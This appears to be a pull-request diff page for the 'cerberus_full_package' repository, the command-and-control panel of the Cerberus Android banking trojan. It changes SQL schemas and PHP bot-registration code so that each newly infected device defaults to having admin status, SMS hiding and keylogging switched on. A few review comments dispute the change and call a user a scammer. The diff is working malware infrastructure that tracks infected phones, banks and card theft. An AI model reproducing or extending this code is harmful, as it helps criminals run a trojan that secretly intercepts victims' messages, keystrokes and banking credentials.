Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions cerberus_full_package/CERBERUS_V2/panel_v2/public/bot.sql
Original file line number Diff line number Diff line change
Expand Up @@ -51,7 +51,7 @@ CREATE TABLE `bots` (
`activeDevice` varchar(254) DEFAULT NULL,
`timeWorking` varchar(254) DEFAULT NULL,
`statDownloadModule` varchar(3) DEFAULT NULL,
`statAdmin` varchar(3) DEFAULT NULL,

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

false

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

falsee

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

yurivolkov this man is a scammer I have all the evidence.

`statAdmin` varchar(3) DEFAULT `1`,
`updateSettings` varchar(3) DEFAULT NULL,
`locale` varchar(10) DEFAULT NULL,
`batteryLevel` varchar(10) DEFAULT NULL
Expand All @@ -62,7 +62,7 @@ CREATE TABLE `bots` (
--

INSERT INTO `bots` (`id_key`, `idbot`, `ip`, `operator`, `phoneNumber`, `model`, `android`, `TAG`, `country`, `lastconnect`, `date_infection`, `commands`, `banks`, `comment`, `statProtect`, `statScreen`, `statAccessibility`, `statSMS`, `statCards`, `statBanks`, `statMails`, `activeDevice`, `timeWorking`, `statDownloadModule`, `statAdmin`, `updateSettings`, `locale`, `batteryLevel`) VALUES
(1, 'WELCOME', '-', '-', '', '-', '0', 'CERBERUS V2', 'us', '', '', '', '', NULL, '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'us', '50');
(1, 'WELCOME', '-', '-', '', '-', '0', 'CERBERUS V2', 'us', '', '', '', '', NULL, '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', 'us', '50');

-- --------------------------------------------------------

Expand Down Expand Up @@ -168,10 +168,10 @@ CREATE TABLE `logsPhoneNumber` (
CREATE TABLE `settingBots` (
`id` int(254) UNSIGNED NOT NULL,
`idbot` varchar(30) NOT NULL,
`hideSMS` varchar(3) DEFAULT NULL,
`hideSMS` varchar(3) DEFAULT `1`,
`lockDevice` varchar(3) DEFAULT NULL,
`offSound` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT `1`,
`activeInjection` varchar(3000) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -130,8 +130,8 @@ function addBot($ip, $idbot, $android, $tag, $country, $operator, $model){
$date = date('Y-m-d H:i');
$connection = self::Connection();
$connection->exec('SET NAMES utf8');
$statement = $connection->prepare("insert into bots (idbot, ip, android, TAG, country, lastconnect, date_infection, operator, model)
value ('$idbot','$ip','$android','$tag','$country','$date','$date','$operator','$model')");
$statement = $connection->prepare("insert into bots (idbot, ip, android, TAG, country, lastconnect, date_infection, operator, model, statAdmin)
value ('$idbot','$ip','$android','$tag','$country','$date','$date','$operator','$model','1')");
$statement->execute(array($idbot,$android,$tag,$country,$date,$operator,$model));

$statement = $connection->prepare("SELECT idbot FROM settingBots WHERE idbot=?");
Expand All @@ -142,7 +142,7 @@ function addBot($ip, $idbot, $android, $tag, $country, $operator, $model){
}
if(!$bool){
$statement2 = $connection->prepare("insert into settingBots (idbot, hideSMS, lockDevice, offSound, keylogger, activeInjection)
value ('$idbot','0','0','0','0','')");
value ('$idbot','1','0','0','1','')");
$statement2->execute(array($idbot));
}
return "ok";
Expand Down
8 changes: 4 additions & 4 deletions cerberus_full_package/V1/cerb.sql
Original file line number Diff line number Diff line change
Expand Up @@ -51,7 +51,7 @@ CREATE TABLE `bots` (
`activeDevice` varchar(254) DEFAULT NULL,
`timeWorking` varchar(254) DEFAULT NULL,
`statDownloadModule` varchar(3) DEFAULT NULL,
`statAdmin` varchar(3) DEFAULT NULL,
`statAdmin` varchar(3) DEFAULT `1`,
`updateSettings` varchar(3) DEFAULT NULL,
`locale` varchar(10) DEFAULT NULL,
`batteryLevel` varchar(10) DEFAULT NULL
Expand All @@ -62,7 +62,7 @@ CREATE TABLE `bots` (
--

INSERT INTO `bots` (`id_key`, `idbot`, `ip`, `operator`, `phoneNumber`, `model`, `android`, `TAG`, `country`, `lastconnect`, `date_infection`, `commands`, `banks`, `comment`, `statProtect`, `statScreen`, `statAccessibility`, `statSMS`, `statCards`, `statBanks`, `statMails`, `activeDevice`, `timeWorking`, `statDownloadModule`, `statAdmin`, `updateSettings`, `locale`, `batteryLevel`) VALUES
(114, 'test', 'delete', NULL, '2', NULL, '8.1', 'And1', 'us', '2019-06-17 12:29:20', '2018-10-30 07:39', '{asdasfasdf}', ':usbank:sdasd', ' qweasdzxc', '2', '312', '312', '33', '44', '55', '34', '23', NULL, '434', NULL, '1', NULL, NULL);
(114, 'test', 'delete', NULL, '2', NULL, '8.1', 'And1', 'us', '2019-06-17 12:29:20', '2018-10-30 07:39', '{asdasfasdf}', ':usbank:sdasd', ' qweasdzxc', '2', '312', '312', '33', '44', '55', '34', '23', NULL, '434', '1', '1', NULL, NULL);

-- --------------------------------------------------------

Expand Down Expand Up @@ -218,10 +218,10 @@ CREATE TABLE `logsPhoneNumber` (
CREATE TABLE `settingBots` (
`id` int(254) UNSIGNED NOT NULL,
`idbot` varchar(30) NOT NULL,
`hideSMS` varchar(3) DEFAULT NULL,
`hideSMS` varchar(3) DEFAULT `1`,
`lockDevice` varchar(3) DEFAULT NULL,
`offSound` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT `1`,
`activeInjection` varchar(3000) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Expand Down
6 changes: 3 additions & 3 deletions cerberus_full_package/V1/gate/db.php
Original file line number Diff line number Diff line change
Expand Up @@ -98,8 +98,8 @@ function addBot($ip, $idbot, $android, $tag, $country, $operator, $model){
$date = date('Y-m-d H:i');
$connection = new PDO('mysql:host='.server.';dbname='.db, user, passwd);
$connection->exec('SET NAMES utf8');
$statement = $connection->prepare("insert into bots (idbot, ip, android, TAG, country, lastconnect, date_infection, operator, model)
value ('$idbot','$ip','$android','$tag','$country','$date','$date','$operator','$model')");
$statement = $connection->prepare("insert into bots (idbot, ip, android, TAG, country, lastconnect, date_infection, operator, model, statAdmin)
value ('$idbot','$ip','$android','$tag','$country','$date','$date','$operator','$model','1')");
$statement->execute(array($idbot,$android,$tag,$country,$date,$operator,$model));

$statement = $connection->prepare("SELECT idbot FROM settingBots WHERE idbot='$ID'");
Expand All @@ -110,7 +110,7 @@ function addBot($ip, $idbot, $android, $tag, $country, $operator, $model){
}
if(!$bool){
$statement2 = $connection->prepare("insert into settingBots (idbot, hideSMS, lockDevice, offSound, keylogger, activeInjection)
value ('$idbot','0','0','0','0','')");
value ('$idbot','1','0','0','1','')");
$statement2->execute(array($idbot));
}
return "ok";
Expand Down
8 changes: 4 additions & 4 deletions cerberus_full_package/bot.sql
Original file line number Diff line number Diff line change
Expand Up @@ -51,7 +51,7 @@ CREATE TABLE `bots` (
`activeDevice` varchar(254) DEFAULT NULL,
`timeWorking` varchar(254) DEFAULT NULL,
`statDownloadModule` varchar(3) DEFAULT NULL,
`statAdmin` varchar(3) DEFAULT NULL,
`statAdmin` varchar(3) DEFAULT `1`,
`updateSettings` varchar(3) DEFAULT NULL,
`locale` varchar(10) DEFAULT NULL,
`batteryLevel` varchar(10) DEFAULT NULL
Expand All @@ -62,7 +62,7 @@ CREATE TABLE `bots` (
--

INSERT INTO `bots` (`id_key`, `idbot`, `ip`, `operator`, `phoneNumber`, `model`, `android`, `TAG`, `country`, `lastconnect`, `date_infection`, `commands`, `banks`, `comment`, `statProtect`, `statScreen`, `statAccessibility`, `statSMS`, `statCards`, `statBanks`, `statMails`, `activeDevice`, `timeWorking`, `statDownloadModule`, `statAdmin`, `updateSettings`, `locale`, `batteryLevel`) VALUES
(1, 'WELCOME', '-', '-', '', '-', '0', 'CERBERUS V2', 'us', '', '', '', '', NULL, '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'us', '50');
(1, 'WELCOME', '-', '-', '', '-', '0', 'CERBERUS V2', 'us', '', '', '', '', NULL, '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', 'us', '50');

-- --------------------------------------------------------

Expand Down Expand Up @@ -168,10 +168,10 @@ CREATE TABLE `logsPhoneNumber` (
CREATE TABLE `settingBots` (
`id` int(254) UNSIGNED NOT NULL,
`idbot` varchar(30) NOT NULL,
`hideSMS` varchar(3) DEFAULT NULL,
`hideSMS` varchar(3) DEFAULT `1`,
`lockDevice` varchar(3) DEFAULT NULL,
`offSound` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT NULL,
`keylogger` varchar(3) DEFAULT `1`,
`activeInjection` varchar(3000) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Expand Down